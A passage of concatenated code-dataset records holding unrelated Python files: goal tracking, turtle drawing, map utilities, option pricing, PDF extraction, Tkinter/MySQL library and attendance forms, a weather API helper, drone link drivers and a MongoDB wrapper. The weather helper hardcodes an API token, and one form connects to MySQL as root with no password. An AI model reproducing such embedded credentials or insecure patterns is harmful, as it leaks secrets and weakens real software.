reached_all_goals(self, state=None, with_subgoals=False):\n if self.dirty:\n if state == None:\n state = self.services.perception.get_state()\n self._check_goal(state)\n current_completed_subgoals = self.__count_completed_subgoals(state)\n is_subgoal_completed = (\n current_completed_subgoals > self.__last_completed_subgoals_count\n )\n self.__last_completed_subgoals_count = current_completed_subgoals\n self.dirty = False\n if with_subgoals:\n return not self.uncompleted_goals, is_subgoal_completed\n return not self.uncompleted_goals\n if with_subgoals:\n return not self.uncompleted_goals, False\n return not self.uncompleted_goals\n\n def on_action(self):\n self.dirty = True\n\n def reset(self):\n self.__initialize()\n\n def __initialize(self):\n self.dirty = self.services.goal_tracking.dirty\n self.completed_goals = copy.deepcopy(\n self.services.goal_tracking.completed_goals\n )\n self.uncompleted_goals = copy.deepcopy(\n self.services.goal_tracking.uncompleted_goals\n )\n\n self.__uncompleted_subgoals = parser.flat_goals(self.uncompleted_goals)\n self.__last_completed_subgoals_count = 0\n\n def __count_completed_subgoals(self, state):\n done_subgoals = list()\n for subgoal in self.__uncompleted_subgoals:\n done_subgoal = subgoal.test(state)\n if done_subgoal:\n done_subgoals.append(subgoal)\n return len(done_subgoals)\n\n def _check_goal(self, state):\n to_remove = list()\n for goal in self.uncompleted_goals:\n done_subgoal = self.services.parser.test_condition(goal, state)\n if done_subgoal:\n to_remove.append(goal)\n for goal in to_remove:\n self.uncompleted_goals.remove(goal)\n self.completed_goals.append(goal)\n","repo_name":"Oph123/Executioner","sub_path":"Executioner-main/agents/Ostkaka/utils/goal_tracking_custom.py","file_name":"goal_tracking_custom.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14830602455","text":"from turtle import fd, bk, lt, rt, pu, pd, 
speed\n\nspeed('fastest')\n\ndef kwadrat(bok):\n for i in range(4):\n fd(bok)\n rt(90)\n\ndef rozeta(N, a, b):\n for i in range(N):\n fd(b)\n kwadrat(a)\n bk(b)\n rt(360 / N)\n\ndef wzorek():\n for i in range(100):\n kwadrat(20 + i)\n rt(4)\n pu() # with the pen up, some of the squares disappear\n fd(12)\n pd() # this also disappears\n\n\nrozeta(36,20,50)\n","repo_name":"miloczek/Projekty-II-UWR","sub_path":"my python/wykłady python/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"37345732986","text":"from scipy import signal\n\nimport numpy as np\nimport os\nimport rhctensor\nimport torch\nimport cache\n\n\ndef world2map(mapdata, poses, out=None):\n if out is None:\n print(\"out cannot be None\")\n exit(1)\n\n assert poses.size() == out.size()\n\n out[:, :] = poses\n scale = float(mapdata.resolution)\n\n # translation\n out[:, 0].sub_(mapdata.origin_x).mul_(1.0/scale)\n out[:, 1].sub_(mapdata.origin_y).mul_(1.0/scale)\n out[:, 2] += mapdata.angle\n\n xs = out[:, 0]\n ys = out[:, 1]\n\n # we need to store the x coordinates since they will be overwritten\n xs_p = xs.clone()\n\n out[:, 0] = xs * mapdata.angle_cos - ys * mapdata.angle_sin\n out[:, 1] = xs_p * mapdata.angle_sin + ys * mapdata.angle_cos\n\n\ndef world2mapnp(mapdata, poses):\n # translation\n poses[:, 0] -= mapdata.origin_x\n poses[:, 1] -= mapdata.origin_y\n\n # scale\n poses[:, :2] *= (1.0 / float(mapdata.resolution))\n\n # we need to store the x coordinates since they will be overwritten\n temp = np.copy(poses[:, 0])\n poses[:, 0] = mapdata.angle_cos * poses[:, 0] - mapdata.angle_sin * poses[:, 1]\n poses[:, 1] = mapdata.angle_sin * temp + mapdata.angle_cos * poses[:, 1]\n poses[:, 2] += mapdata.angle\n\n\ndef map2worldnp(mapdata, poses):\n # rotation\n # we need to store the x coordinates since they will be overwritten\n temp = np.copy(poses[:, 0])\n poses[:, 0] = mapdata.angle_cos * poses[:, 0] - mapdata.angle_sin * poses[:, 1]\n poses[:, 1] = mapdata.angle_sin * temp + mapdata.angle_cos * poses[:, 1]\n\n # scale\n poses[:, :2] *= float(mapdata.resolution)\n\n # translate\n poses[:, 0] += mapdata.origin_x\n poses[:, 1] += mapdata.origin_y\n poses[:, 2] += mapdata.angle\n\n\ndef load_permissible_region(params, map):\n \"\"\"\n get_map is a function that lazily gets all the mapdata\n * only use if map data is needed otherwise use cached data\n \"\"\"\n path = cache.get_cache_map_dir(params, map)\n perm_reg_file = os.path.join(path, \"perm_region.npy\")\n\n if os.path.isfile(perm_reg_file):\n pr = np.load(perm_reg_file)\n else:\n map_data = map.data()\n array_255 = map_data.reshape((map.height, map.width))\n pr = np.zeros_like(array_255, dtype=bool)\n\n # Numpy array of dimension (map_msg.info.height, map_msg.info.width),\n # With values 0: not permissible, 1: permissible\n pr[array_255 == 0] = 1\n pr = np.logical_not(pr) # 0 is permissible, 1 is not\n\n KERNEL_SIZE = 31 # 15 cm = 7 pixels = kernel size 15x15\n kernel = np.ones((KERNEL_SIZE, KERNEL_SIZE))\n kernel /= kernel.sum()\n pr = signal.convolve2d(pr, kernel, mode='same') > 0 # boolean 2d array\n np.save(perm_reg_file, pr)\n\n return torch.from_numpy(pr.astype(np.int)).type(rhctensor.byte_tensor())\n","repo_name":"romesco/correctiveFB_utils","sub_path":"ros_util/librhc/utils/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"43195197342","text":"#/usr/bin/env python\nimport os\nimport sys\n\nimport unittest\nfrom confined import parse, templatize\n\n\nfeval = lambda rpn: templatize(dict(\n a=1,\n b=2,\n a_string = \"a beautiful world Isint ?\",\n\n ), \"<: %s :>\" % rpn \n)\n\nclass TestCheck_Arg(unittest.TestCase):\n\n def test_first(self):\n self.assertEqual(feval(\"2: 2: ADD\"), \"4.0\")\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=7)\n","repo_name":"jul/confined","sub_path":"confined/test_valid.py","file_name":"test_valid.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"}
+{"seq_id":"3625671169","text":"# Reference:\n# <> Espen G. Haug\n#\n\n#import numpy as np\n#from .Distribution import cnd\nfrom math import log,exp,sqrt,pi\nfrom scipy.stats import norm\n\ndef HartAlgo(x):\n y=abs(x)\n k=exp(-y**2.0*0.5)\n if y>37.0:\n p=0.0\n elif y>=7.07106781186547:\n p=k/(y+1.0/(y+2.0/(y+3.0/(y+4.0/(y+0.65)))))/2.506628274631\n else:\n A=(((((0.0352624965998911*y+0.700383064443688)*y+6.37396220353165)*y+33.912866078383)*y+112.079291497871)*y+\n 221.213596169931)*y+220.206867912376\n B=((((((0.0883883476483184*y+1.75566716318264)*y+16.064177579207)*y+86.7807322029461)*y+296.564248779674)*y+\n 637.333633378831)*y+793.826512519948)*y+440.413735824752\n p=k*A/B\n if x>0.0:\n p=1.0-p\n return p\n\ndef PolyApprox4(x):\n '''\n the following approximation of N(x) produces values to within 4-decimal-place accuracy\n :param x:\n :return:\n '''\n y=abs(x)\n k=1.0/(1.0+0.33267*y)\n p=exp(-y**2.0*0.5)/sqrt(2.0*pi)*(0.4361836*k-0.1201676*k**2.0+0.9372980*k**3.0)\n if x>=0.0:\n return 1.0-p\n else:\n return p\n\ndef PolyApprox6(x):\n '''\n the following approximation of N(x), described by Abramowitz and Stegun(1974), produces values to within\n 6 decimal places of the true value.\n :param x:\n :return:\n '''\n y=abs(x)\n k=1.0/(1.0+0.2316419*y)\n p=exp(-y**2.0*0.5)/sqrt(2.0*pi)*\\\n (0.31938153*k-0.356563782*k**2.0+1.781477937*k**3.0-1.821255978*k**4.0+1.330274429*k**5.0)\n if x>=0.0:\n return 1.0-p\n else:\n return p\n\ndef cnd(x,method='default'): # cumulative normal distribution function\n '''\n , Chapter 13\n Note: norm.cdf() in Python appears to use exactly the Hart algorithm\n '''\n if method=='default':\n return norm.cdf(x)\n elif method=='HartAlgo':\n return HartAlgo(x)\n elif method=='PolyApprox6':\n return PolyApprox6(x)\n else:\n return PolyApprox4(x)\n\n\ndef BSM(flag, S, K, r, T, sigma, q=0.0):\n '''\n European option, Black-Scholes(1973), allowing for a continuous dividend yield\n '''\n assert (T>0.0) & (sigma>0.0)\n d1=(log(S/K)+(r-q+sigma**2.0*0.5)*T)/sigma/sqrt(T)\n d2=d1-sigma*sqrt(T)\n if flag>0.0: # call\n return S*exp(-q*T)*cnd(d1)-K*exp(-r*T)*cnd(d2)\n else: # put\n return K*exp(-r*T)*cnd(-d2)-S*exp(-q*T)*cnd(-d1)\ndef GeneralizedBSM(flag, S, K, r, T, sigma, q=0.0):\n '''\n European option, the BSM model can be \"generalized\" by incorporating a cost-of-carry rate b;\n c=S*exp((b-r)T)*N(d1)-K*exp(-rT)*N(d2)\n p=K*exp(-rT)*N(-d2)-S*exp((b-r)T)*N(-d1)\n d1=(ln(S/K)+(b+sigma**2/2)T)/(sigma*sqrt(T))\n d2=d1-sigma*sqrt(T)\n ====================\n b=r gives the BS(1973) stock option model;\n b=r-q gives the Merton(1973) stock option model with continuous dividend yield q;\n b=0 gives the Black(1976) futures option model;\n b=0, r=0 gives the Asay(1982) margined futures option model;\n b=r-rf gives the Garman and Kohlhagen(1983) currency option model\n '''\n assert (T>0.0) & (sigma>0.0)\n b=r\n d1=(log(S/K)+(b+sigma**2.0/2.0)*T)/sigma/sqrt(T)\n 
d2=d1-sigma*sqrt(T)\n if flag>0.0: # call\n return S*exp((b-r)*T)*cnd(d1)-K*exp(-r*T)*cnd(d2)\n else: # put\n return K*exp(-r*T)*cnd(-d2)-S*exp((b-r)*T)*cnd(-d1)","repo_name":"Harbes/python","sub_path":"OptionMatrix/BSM.py","file_name":"BSM.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72794039092","text":"import numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--length\", \"-l\", type = int, help = \"Output length\", default = 100)\nparser.add_argument(\"--output\", \"-o\", type = str, help = \"Output file\", default = \"static_current.csv\")\nparser.add_argument(\"--value\", \"-v\", type = float, help = \"Value of I\", default = 1)\nargs = parser.parse_args()\n\n#Generate values for I\ncurrent = [args.value for _ in range(args.length)]\ncurrent = map(str, current)\n\n#Send values to file\nw = open(args.output, \"w\")\nw.write(\"\\n\".join(current))\nw.close()\n","repo_name":"jonmarty/Morris-Lecar","sub_path":"CreateStaticI.py","file_name":"CreateStaticI.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39584117047","text":"import os\nimport pdfplumber\n\nfrom pathlib import Path\n\n\ndef def_header_and_boxes(page):\n # print(page.extract_text())\n\n # ## bounding_box parameters ###\n #\n # x0: distance left border of page to left border of box\n # top: distance top of page to top of box\n # x1: distance left border of page to right border of box\n # bottom: distance top of page to bottom of box\n #\n # bounding_box: (x0, top, x1, bottom)\n # ##\n\n bounding_box_left = (0,\n 0.1 * float(page.height),\n 0.48 * float(page.width),\n page.height)\n\n bounding_box_right = (0.5 * float(page.width),\n 0.1 * float(page.height),\n page.width,\n page.height)\n\n bounding_box_header = (0,\n 0,\n page.width,\n 0.1 * float(page.height))\n\n return bounding_box_header, bounding_box_left, bounding_box_right\n\n\ndef get_text_w_pdfplumber(file_loc: str = None) -> str:\n # https://stackoverflow.com/a/4060259/6597765\n __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) # noqa\n path = Path(__location__)\n __location__ = path.parent.parent.absolute()\n\n # bgbl too difficult:\n # file_loc = os.path.join(__location__, \"PDFs/bgbl1_2021_75.pdf\") # noqa\n # file_loc = os.path.join(__location__, \"PDFs/percentages_float_and_high_numbers.pdf\") # noqa\n file_loc = os.path.join(__location__, \"PDFs/left_col_bottom_to_right_col_top.pdf\") # noqa\n\n pdf = pdfplumber.open(file_loc)\n\n inp = input(\"All pages? 
y/N - if no, only first page will be extracted\")\n if inp == \"y\":\n text = ''\n for page in pdf.pages:\n header_bbox, left_bbox, right_bbox = def_header_and_boxes(page)\n\n header = page.crop(header_bbox)\n header_text = header.extract_text()\n if header_text:\n header_text = \"\\n\\nheader:\\n\" + header_text\n else:\n header_text = \"\\nheader:\\n\"\n\n left_box = page.crop(left_bbox)\n left_box_text = left_box.extract_text()\n if left_box_text:\n left_box_text = \"\\nleft_box:\\n\" + left_box_text\n else:\n left_box_text = \"\\nleft_box:\\n\"\n\n right_box = page.crop(right_bbox)\n right_box_text = right_box.extract_text()\n if right_box_text:\n right_box_text = \"\\nright_box:\\n\" + right_box_text\n else:\n right_box_text = \"\\nright_box:\\n\"\n\n for text_el in [header_text, left_box_text, right_box_text]:\n if text_el:\n text = text + text_el\n else:\n text = ''\n page = pdf.pages[0]\n header, left_box, right_box = def_header_and_boxes(page)\n\n header_text = header.extract_text()\n left_box_text = left_box.extract_text()\n right_box_text = right_box.extract_text()\n text = text + header_text + left_box_text + right_box_text\n\n pdf.close()\n\n return text\n\n\nif __name__ == \"__main__\":\n from contextlib import redirect_stdout\n\n text = get_text_w_pdfplumber()\n print(text)\n with open(\"result.txt\", \"w\") as fout:\n with redirect_stdout(fout):\n print(text)\n\n# header, left_col, right_col = get_text_w_pdfplumber()\n# print(header)\n# print()\n# print(left_col)\n# print()\n# print(right_col)\n","repo_name":"0LL13/PDF_is_evil","sub_path":"pdfplumber/pdfplumber/PDF2text_pdfplumber.py","file_name":"PDF2text_pdfplumber.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36518063114","text":"from ast import Delete, excepthandler\r\nfrom cProfile import label\r\nfrom email.mime import image\r\nfrom logging import root\r\nfrom re import L\r\nfrom tkinter import * \r\nfrom subprocess import call # to import the tkinter library\r\nfrom tkinter import ttk, messagebox # to handle selections and the error/security message boxes\r\nfrom turtle import bgcolor, title\r\n#from tkcalendar import *\r\nimport pymysql \r\n \r\n\r\nclass ajoutlivres: # form class:\r\n def __init__(self,root): \r\n self.PageAjouterDesLivres = root\r\n self.PageAjouterDesLivres.title(\"Ajouter un livre\") # window title \"Ajouter un livre\"\r\n self.PageAjouterDesLivres.geometry(\"1040x560+400+200\") # application size\r\n self.PageAjouterDesLivres.resizable(width=False, height=False)# prevent the window from being resized\r\n self.PageAjouterDesLivres.iconbitmap()# load the icon \r\n\r\n\r\n # declare variables so they can be retrieved later\r\n self.TitreLivre = StringVar()\r\n self.Auteurs = StringVar()\r\n self.Editeurs = StringVar()\r\n self.Collections = StringVar()\r\n self.Etat = StringVar()\r\n\r\n \r\n \r\n\r\n\r\n # green book-management panel\r\n self.Paneauvertdegestionlivres = Frame(self.PageAjouterDesLivres, bg=\"#bedb0d\")\r\n self.Paneauvertdegestionlivres.place(x=190, y=0, width=1100, height=1000)\r\n\r\n # orange panel\r\n Paneauorangedegestionlivres = Frame(self.PageAjouterDesLivres, bg=\"#ff7f00\")\r\n Paneauorangedegestionlivres.place(x=0, y=0, width=190, height=1000)\r\n\r\n self.imageicon2 = PhotoImage()\r\n self.btn = Button(self.PageAjouterDesLivres,command=self.VersGestionlivres, text=\"\",compound=LEFT,image=self.imageicon2, width=184,height=90, bg=\"#ff7f00\",font=\"arial 12 bold\")\r\n self.btn.place(x=0 , y=0) \r\n \r\n self.imageicon3 = PhotoImage()\r\n self.btn1 = Button(self.PageAjouterDesLivres,command=self.VersAdherents ,text=\"\",compound=LEFT,image=self.imageicon3, width=184, height=90, bg=\"#ff7f00\",font=\"arial 12 bold\")\r\n self.btn1.place(x=0 , y=140) \r\n\r\n self.imageicon4 = PhotoImage()\r\n self.btn2 = Button(self.PageAjouterDesLivres,command=self.VersGestiondesprets, text=\"\",compound=LEFT,image=self.imageicon4, width=184, height=90, bg=\"#ff7f00\",font=\"arial 12 bold\")\r\n self.btn2.place(x=0 , y=280) \r\n\r\n self.imageicon5 = PhotoImage()\r\n self.btn3 = Button(self.PageAjouterDesLivres, text=\"\",command=self.PourSedeconnecter,compound=LEFT,image=self.imageicon5, width=184, height=90, bg=\"#ff7f00\",font=\"arial 12 bold\")\r\n self.btn3.place(x=0 , y=420)\r\n\r\n labelgestionlivres = Label(self.PageAjouterDesLivres, text=\" Gestion Livres \",font =(\"algarian\", 15,\"bold\"), bg=\"#ff7f00\", fg=\"black\")\r\n labelgestionlivres.place(x=0, y=100,width=190)\r\n\r\n labeladherents = Label(self.PageAjouterDesLivres, text=\" Adhérents \",font =(\"algarian\", 15,\"bold\"), bg=\"#ff7f00\", fg=\"black\")\r\n labeladherents.place(x=0, y=240,width=190)\r\n\r\n labelgestionprets = Label(self.PageAjouterDesLivres, text=\" Gestion Prêts\",font =(\"algarian\", 15,\"bold\"), bg=\"#ff7f00\", fg=\"black\")\r\n labelgestionprets.place(x=0, y=380,width=190)\r\n\r\n labelsedeconnecter = Label(self.PageAjouterDesLivres, text=\" Se déconnecter\",font =(\"algarian\", 15,\"bold\"), bg=\"#ff7f00\", fg=\"black\")\r\n labelsedeconnecter.place(x=0, y=520,width=190) \r\n\r\n labelgestionlivretitre = Label(self.PageAjouterDesLivres, text=\" Ajouter un livre \",font =(\"algarian\", 20,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labelgestionlivretitre.place(x=350, y=20,width=500)\r\n\r\n # labels: the titles \r\n\r\n labeltitres = Label(self.PageAjouterDesLivres, text=\" Titre \",font =(\"algarian\", 12,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labeltitres.place(x=300, y=150,width=100)\r\n\r\n labelauteurs = Label(self.PageAjouterDesLivres, text=\" Auteur \",font =(\"algarian\", 12,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labelauteurs.place(x=310, y=200,width=100)\r\n\r\n labelcollections = Label(self.PageAjouterDesLivres, text=\" Collection \",font =(\"algarian\", 12,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labelcollections.place(x=323, y=240,width=100)\r\n\r\n labelediteurs = Label(self.PageAjouterDesLivres, text=\" Editeur \",font =(\"algarian\", 12,\"bold\"), bg=\"#bedb0d\", fg=\"black\")\r\n labelediteurs.place(x=312, y=280,width=100)\r\n \r\n \r\n \r\n \r\n # ENTRY = input fields\r\n\r\n TitreLivre= Entry(self.PageAjouterDesLivres,textvariable=self.TitreLivre, font= (5), bg=\"white\")\r\n TitreLivre.place(x=500, y=150,width=150)\r\n\r\n Auteurs= Entry(self.PageAjouterDesLivres, textvariable=self.Auteurs,font= (5), bg=\"white\")\r\n Auteurs.place(x=500, y=200,width=150)\r\n\r\n Collections= Entry(self.PageAjouterDesLivres,textvariable=self.Collections, font= (5), bg=\"white\")\r\n Collections.place(x=500, y=240,width=150)\r\n\r\n Editeurs= Entry(self.PageAjouterDesLivres,textvariable=self.Editeurs, font= (5), bg=\"white\")\r\n Editeurs.place(x=500, y=280,width=150)\r\n\r\n \r\n \r\n # button\r\n BoutonAjouterUnlivre = Button(self.PageAjouterDesLivres,command=self.ClickAjouterUnLivre, text=\"Ajouter\",cursor=\"hand2\", font=(\"times new roman\",11), bd=0,bg=\"white\",fg=\"black\")\r\n 
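# the Add button: ClickAjouterUnLivre (defined below) validates the fields and inserts the new book into the database\r\n 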
BoutonAjouterUnlivre.place(x=700, y=400)\r\n\r\n\r\n def VersAdherents(self):\r\n self.PageAjouterDesLivres.destroy()\r\n call([\"python\", \"Adherents.py\"])\r\n\r\n def VersGestiondesprets(self):\r\n self.PageAjouterDesLivres.destroy()\r\n call([\"python\", \"Gestiondesprets.py\"])\r\n \r\n def VersGestionlivres(self):\r\n self.PageAjouterDesLivres.destroy()\r\n call([\"python\", \"Gestionlivres.py\"])\r\n \r\n def PourSedeconnecter(self):\r\n lemessagebox = messagebox.askyesno(\"Déconnexion\",\"Voulez-vous vous déconnecter\", parent=self.PageAjouterDesLivres)\r\n if lemessagebox == YES:\r\n self.PageAjouterDesLivres.destroy()\r\n call([\"python\", \"Connexion.py\"])\r\n\r\n \r\n def ClickAjouterUnLivre(self):\r\n if self.TitreLivre.get()==\"\" or self.Auteurs.get()==\"\" or self.Editeurs.get()==\"\" or self.Collections.get()==\"\" or self.Etat.get()==\"\":\r\n messagebox.showerror(\"Erreur\", \"Veuillez remplir tout les champs\", parent=self.PageAjouterDesLivres) # if any field is empty, show a message box saying the fields are not filled in\r\n return\r\n \r\n try:\r\n con= pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"bibyaso\")\r\n cur=con.cursor()\r\n cur.execute(\"select * from ajouterdeslivres where TitreLivre=%s\",self.TitreLivre.get())\r\n row= cur.fetchone()\r\n\r\n if row!= None:\r\n messagebox.showerror(\"Erreur\", \"Ce livre existe deja\", parent=self.PageAjouterDesLivres)\r\n else:\r\n cur.execute(\"insert into ajouterdeslivres (TitreLivre, Auteurs, Collections, Editeurs,Etat) values (%s,%s,%s,%s,%s)\",\r\n (\r\n \r\n self.TitreLivre.get(),\r\n self.Auteurs.get(),\r\n self.Editeurs.get(),\r\n self.Collections.get(),\r\n self.Etat.get()\r\n \r\n ))\r\n\r\n messagebox.showinfo(\"Succes\",\"Votre livre à été gérée\", parent=self.PageAjouterDesLivres)\r\n \r\n con.commit()\r\n con.close()\r\n except Exception as es:\r\n messagebox.showerror(\"erreur\",f\"Erreur de connexion{str(es)}\",parent=self.PageAjouterDesLivres)\r\n \r\n \r\n\r\n \r\n\r\nroot =Tk()\r\nobj = ajoutlivres(root)\r\nroot.mainloop()","repo_name":"yassineaitalla/bib","sub_path":"GestionDeLivresDansUneBibliotheque/GestionDeLivresDansUneBibliotheque/Ajouterdeslivres.py","file_name":"Ajouterdeslivres.py","file_ext":"py","file_size_in_byte":7868,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12262354720","text":"from app import app\nimport requests\n\n\ndef consultar_tempo(cidade_id):\n TOKEN = \"b22460a8b91ac5f1d48f5b7029891b53\"\n url = f\"http://apiadvisor.climatempo.com.br/api/v1/forecast/locale/{cidade_id}/days/15?token={TOKEN}\"\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['data']\n else:\n return None\n","repo_name":"bsgabrielsilva/testea","sub_path":"app/services/consultar_tempo.py","file_name":"consultar_tempo.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"34196482737","text":"import logging\nimport os\n\nfrom .exceptions import WrongUriType\nfrom .prrtdriver import PrrtDriver\nfrom .radiodriver import RadioDriver\nfrom .serialdriver import SerialDriver\nfrom .tcpdriver import TcpDriver\nfrom .udpdriver import UdpDriver\nfrom .usbdriver import UsbDriver\n\n__author__ = 'Bitcraze AB'\n__all__ = []\n\nlogger = logging.getLogger(__name__)\n\n\nCLASSES = []\n\n\ndef init_drivers(enable_debug_driver=False, enable_serial_driver=False):\n \"\"\"Initialize all the 
drivers.\"\"\"\n\n env = os.getenv('USE_CFLINK')\n if env is not None and env == 'cpp':\n from .cflinkcppdriver import CfLinkCppDriver\n CLASSES.append(CfLinkCppDriver)\n else:\n CLASSES.extend([RadioDriver, UsbDriver])\n\n if enable_debug_driver:\n logger.warn('The debug driver is no longer supported!')\n\n if enable_serial_driver:\n CLASSES.append(SerialDriver)\n\n CLASSES.extend([UdpDriver, PrrtDriver, TcpDriver])\n\n\ndef scan_interfaces(address=None):\n \"\"\" Scan all the interfaces for available Crazyflies \"\"\"\n available = []\n found = []\n for driverClass in CLASSES:\n try:\n logger.debug('Scanning: %s', driverClass)\n instance = driverClass()\n found = instance.scan_interface(address)\n available += found\n except Exception:\n raise\n return available\n\n\ndef get_interfaces_status():\n \"\"\"Get the status of all the interfaces\"\"\"\n status = {}\n for driverClass in CLASSES:\n try:\n instance = driverClass()\n status[instance.get_name()] = instance.get_status()\n except Exception:\n raise\n return status\n\n\ndef get_link_driver(uri, link_quality_callback=None, link_error_callback=None):\n \"\"\"Return the link driver for the given URI. Returns None if no driver\n was found for the URI or the URI was not well formatted for the matching\n driver.\"\"\"\n for driverClass in CLASSES:\n try:\n instance = driverClass()\n instance.connect(uri, link_quality_callback, link_error_callback)\n return instance\n except WrongUriType:\n continue\n\n return None\n","repo_name":"bitcraze/crazyflie-lib-python","sub_path":"cflib/crtp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":227,"dataset":"github-code","pt":"21"} +{"seq_id":"24070534740","text":"\"\"\"\ndb.py - Database Access\n\"\"\"\nimport os\nfrom pymongo import MongoClient\nimport settings # NOQA\n\n\nclass Database():\n \"\"\"\n Class for connecting to our database\n \"\"\"\n conn = None\n database = os.getenv('DATABASE_NAME', 'falcon')\n\n def __init__(self, fail_silent: bool = True) -> None:\n db_url = os.getenv('DB_URL', 'mongodb://localhost:27017')\n if not Database.conn:\n Database.conn = MongoClient(db_url)\n print(\"Connected to database at {}\".format(db_url))\n self.fail_silent = fail_silent\n \n def insert_one_result(self, inserted_id: str = None) -> dict:\n \"\"\"\n Return for a fail-silent Insert operation\n \"\"\"\n return {\n 'acknowledged': False,\n 'inserted_id': inserted_id,\n 'already_exists': True\n }\n\n def update_one_result(self) -> dict:\n \"\"\"\n Return for a fail-silent Update operation\n \"\"\"\n return {\n 'acknowledged': False,\n 'matched_count': 0,\n 'modified_count': 0,\n 'upserted_id': None,\n 'raw_result': None\n }\n","repo_name":"tjdaley/falconapi","sub_path":"database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"26119405352","text":"import pygame\n\nclass Thief():\n\n def __init__(self,ai_settings,screen):\n self.screen=screen\n self.ai_settings=ai_settings\n self.small_scale=0.2\n self.image1 = pygame.image.load('Interface_pics/Interface_pics/thief1.png')\n self.image1 = pygame.transform.scale(self.image1, (int(self.image1.get_width() * self.small_scale), int(self.image1.get_height() * self.small_scale))).convert_alpha()\n self.rect1 = self.image1.get_rect()\n self.image2 = pygame.image.load('Interface_pics/Interface_pics/thief2.png')\n self.image2 = 
pygame.transform.scale(self.image2, (int(self.image2.get_width() * self.small_scale), int(self.image2.get_height() * self.small_scale))).convert_alpha()\n self.rect2 = self.image2.get_rect()\n self.image = pygame.image.load('Interface_pics/Interface_pics/thief1.png')\n self.image = pygame.transform.scale(self.image, (int(self.image.get_width() * self.small_scale), int(self.image.get_height() * self.small_scale))).convert_alpha()\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n self.rect.centerx = self.screen_rect.centerx-75\n self.rect.bottom = self.screen_rect.bottom-5\n\n self.center = float(self.rect1.centerx)\n\n self.moving = True\n\n def update(self):\n if self.image == self.image1:\n self.image = self.image2\n else:\n self.image = self.image1\n\n def blitme(self):\n self.screen.blit(self.image, self.rect)","repo_name":"Jiarui-Xu-Gatech/No-thief-under-Heaven","sub_path":"Thief.py","file_name":"Thief.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26006188713","text":"import tkinter as tk\r\nfrom tkinter.constants import LEFT\r\nimport tkinter.font as tkFont\r\nfrom tkinter import messagebox\r\nfrom tkinter.messagebox import askokcancel, showinfo, WARNING\r\nfrom Recognition import recognize_attendence\r\nfrom DB_MarkAttendance import mark_attendance\r\nfrom datetime import date\r\nfrom DB_DownloadAttendance import download_daily_attendance\r\nfrom PIL import Image, ImageTk\r\nfrom tkinter_custom_button import hover\r\n\r\nattendance_list = []\r\ndef main(root, table_name,class_name, subject_name, username):\r\n \r\n root.title(\"Conduct Attendance\")\r\n \r\n width=741\r\n height=509\r\n screenwidth = root.winfo_screenwidth()\r\n screenheight = root.winfo_screenheight()\r\n alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)\r\n root.geometry(alignstr)\r\n root.resizable(width=False, height=False)\r\n\r\n image1 = Image.open(\"Dataset/BG2.png\")\r\n image1 = image1.resize((735,500),Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n BGLabel=tk.Label(root,image=test)\r\n BGLabel.image=test\r\n #BGLabel[\"bg\"] = \"#393d49\"\r\n ft = tkFont.Font(family='Times',size=10)\r\n BGLabel[\"font\"] = ft\r\n BGLabel[\"justify\"] = \"center\"\r\n BGLabel[\"text\"] = \"\"\r\n BGLabel.place(x=3,y=0,width=735,height=506)\r\n\r\n Back=tk.Button(root)\r\n Back[\"bg\"] = \"#f0f0f0\"\r\n Back[\"borderwidth\"] = \"3px\"\r\n ft = tkFont.Font(family='Times',size=13)\r\n Back[\"font\"] = ft\r\n Back[\"fg\"] = \"#000000\"\r\n Back[\"justify\"] = \"center\"\r\n Back[\"text\"] = \"Back\"\r\n Back.place(x=10,y=10,width=150,height=45)\r\n Back[\"command\"] = lambda : Back_command(root, table_name,class_name, subject_name, username)\r\n hover(Back,\"#f0f0f0\")\r\n\r\n Logout=tk.Button(root)\r\n Logout[\"bg\"] = \"#f0f0f0\"\r\n Logout[\"borderwidth\"] = \"3px\"\r\n ft = tkFont.Font(family='Times',size=13)\r\n Logout[\"font\"] = ft\r\n Logout[\"fg\"] = \"#000000\"\r\n Logout[\"justify\"] = \"center\"\r\n Logout[\"text\"] = \"Logout\"\r\n Logout.place(x=580,y=10,width=150,height=45)\r\n Logout[\"command\"] = lambda : Logout_command(root)\r\n hover(Logout,\"#f0f0f0\")\r\n\r\n 